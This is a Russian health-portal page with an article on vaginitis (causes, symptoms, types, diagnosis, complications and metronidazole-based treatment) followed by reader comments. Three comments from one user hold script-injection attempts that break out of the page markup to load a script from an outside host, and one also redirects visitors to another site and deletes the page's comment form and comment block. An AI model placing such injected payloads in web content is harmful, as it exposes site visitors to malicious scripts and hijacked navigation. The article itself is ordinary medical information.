Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вся правда о вагините  >>  Вся правда о вагините
 
Обратная связь
 

Вся правда о вагините

Размер шрифта
22 сентября 2013 00:00
  • google_analytics: false
  • Нравится

Вагинит – наиболее распространенный вид вагинальной инфекции. Влагалище имеет свою собственную флору, которая заселена «полезными» бактериями.

Вся правда о вагинозе

«Полезные» бактерии контролируют рост и размножение условно-патогенных бактерий. Смысл названия «условно-патогенные» заключается в том, что в определенном количестве эти бактерии должны присутствовать во влагалище, но при их чрезмерном размножении возникает такое состояние, как вагиноз. В таком случае нарушается баланс: либо недостаточно «полезных» бактерий, либо слишком много «условно-патогенных».

По большей части, бактериальный вагиноз  протекает не очень тяжело. Тем не менее, он может привести и к серьезным проблемам, в том числе к развитию более серьезного заболевания – вагинита.  Это воспаление всей слизистой оболочки влагалища, которое вызывается деятельностью болезнетворных микробов.

Причины вагинита

Согласно последним исследованиям, благоприятными факторами для  развития вагинита являются:

  • беспорядочные половые связи: более одного сексуального партнера или новый сексуальный партнер;
  • передача инфекции половым путём
  • слабый иммунитет
  • плохая гигиена
  • спринцевание.

Если вы ограничите количество сексуальных партнеров, перестанете спринцеваться, будете вести здоровый образ жизни и правильно питаться и ухаживать за собой  – вы можете значительно снизить риск этого неприятного и опасного заболевания.

Симптомы вагинита

Главные симптомы вагинита – это:

  • покраснение и набухание слизистой оболочки влагалища;
  • обильные выделения белей (иногда с кровью);
  • боль во время секса;
  • ощущение жжения, зуд наружных половых органов;
  • неприятный запах.

Чаще всего вагиниты вызваны определенным возбудителем. Сегодня ученые выделяют 3 основных вида вагинита:

  • Грибковый (молочница), вызванный грибком Кандида. Сопровождается творожистыми выделениями, интенсивным воспалением и зудом
  • Трихомонадный, вызванный бактерией Трихомонадой. Передаётся половым путем и сопровождается желтыми пенистыми выделениями, воспалением и неприятным запахом
  • Смешанный, когда присутствуют разные бактерии и грибы. Такой вагинит встречается чаще всего и сложнее поддаётся лечению.

Обратитесь к врачу, чтобы вы могли провериться и быть уверенной в своем здоровье.

Как диагностировать вагинит

Для того чтобы проверить, есть ли у вас вагинит, и какого он вида, следует обратиться к гинекологу. Врач проанализирует ваши жалобы, проведет влагалищный осмотр и возьмет мазок для лабораторного исследования. После этого вы сможете точно знать свой диагноз.

К каким проблемам может привести вагинит

В большинстве случаев вагинит легко лечится, но иногда может привести к серьезным проблемам:

  • во время беременности вагинит может спровоцировать выкидыш, преждевременные роды, внутриутробное инфицирование плода и инфекции половой системы;
  • во время операций на органах малого таза (кесарево сечение, аборт, удаление матки) при наличии вагинита инфекция может распространиться на все органы малого таза;
  • при наличии вагинита у вас больше шансов получить инфекцию, передаваемую половым путем.

Как лечить вагинит

Основной метод лечения – антибактериальная терапия. Антибактериальные препараты, основной метронидазол, могут быть назначены в виде капсул для приема внутрь, в виде вагинального крема или свечей.
Курс антибактериальных препаратов  назначают на неделю. Обычно симптомы исчезают через 2-3 дня после начала лечения, однако, прекращать лечение нельзя, так как инфекция может возобновиться.

Иногда побочным эффектом антибактериальной терапии может быть молочница, симптомами которой являются зуд, покраснение и выделения из влагалища белого цвета. В таком случае вам нужно обговорить дальнейшие действия с врачом. Но сегодня существуют комбинированные препараты, в которых есть и антибиотик метронидозол, и противогрибковое средство, например миконазол, который является международным стандартом  лечения. Таким образом, лечится вагинит и не развивается молочница.

Ещё комбинированные препараты являются незаменимыми в лечении смешанных вагинитов, когда присутствуют и грибы и бактерии.

Если вы женщина, и вам не безразлично ваше сексуальное здоровье, специально для вас наш специальный проект «Вся правда о влагалище».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 мая 2014 в 12:35

Цитировать   |   Пожаловаться

Бактериальный вагиноз уже не впервые, до этого несколько раз лечилось, все без толку, через пару месяцев всегда рецидив был, толчком служили простуды, гормональный сбой (отмена горм. контрацептивов).  В последний раз лечилась не у своего лечащего врача, он в отпуске был,  наблюдалась у его заместителя.

2 - zzzzzz

30 июня 2015 в 19:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что такое бактериофаг   Московский музей «Живые системы» приглашает всех   Почему магазины могут обмануть людей, но не обезьян?   Принюхайтесь к соседу! Запах человека говорит о его болезнях!  
19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас? 13 июня 2013Перец, как и сигареты, спасает от Паркинсона!
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Бронхит: лицом к лицу
Что надо знать женщине о своем влагалище
Астма! Когда бежать к врачу?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.